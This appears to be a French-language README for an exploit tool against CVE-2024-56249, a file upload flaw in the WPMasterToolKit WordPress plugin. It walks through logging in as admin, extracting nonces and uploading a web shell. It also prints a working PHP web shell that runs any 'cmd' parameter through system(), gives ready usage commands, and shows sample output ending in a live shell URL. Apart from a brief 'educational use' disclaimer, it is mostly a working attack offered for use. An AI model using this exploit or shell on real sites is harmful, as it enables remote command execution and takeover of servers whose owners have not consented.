
WordPress WPMasterToolKit plugin <= 1.13.1 - vulnérabilité de téléchargement arbitraire de fichiers
Ce script exploite une vulnérabilité de téléchargement arbitraire de fichier dans le plugin WordPress WPMasterToolKit, permettant à un attaquant de télécharger une coque web (web shell) sur le serveur. La vulnérabilité existe dans les versions <= 1.13.1 du plugin.
Pour exploiter cette vulnérabilité, utilisez la commande suivante :
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url : URL WordPress cible (ex. http://192.168.100.74:888/wordpress)-un / --username : Nom d'utilisateur administrateur WordPress-p / --password : Mot de passe administrateur WordPress-fp / --filepath : Chemin de téléchargement du fichier (par défaut : wp-content/uploads/2025/03)-fn / --filename : Nom du fichier à télécharger (par défaut : shell.php)Le script commence par sonder l'URL cible pour vérifier si elle est vulnérable à la CVE-2024-56249 en contrôlant la version du plugin WPMasterToolKit.
Il tente ensuite de se connecter au panneau d'administration WordPress en utilisant les identifiants fournis.
Après une connexion réussie, le script extrait les jetons de sécurité nécessaires (nonce et jeton) requis pour le téléchargement du fichier.
Il télécharge le fichier spécifié (par exemple, une coque web) sur le serveur cible en utilisant les jetons extraits.
Enfin, le script vérifie si le fichier a été téléchargé avec succès en contrôlant son accessibilité via l'URL cible.
Assurez-vous que le fichier de la coque (par exemple shell.php) se trouve dans le même répertoire que le script avant de l'exécuter. Ceci est nécessaire pour que le script puisse localiser et télécharger le fichier avec succès.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
Cet outil est destiné uniquement à des fins éducatives. Utilisez-le à vos propres risques. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Script d'exploit par Nxploit | Khaled Alenazi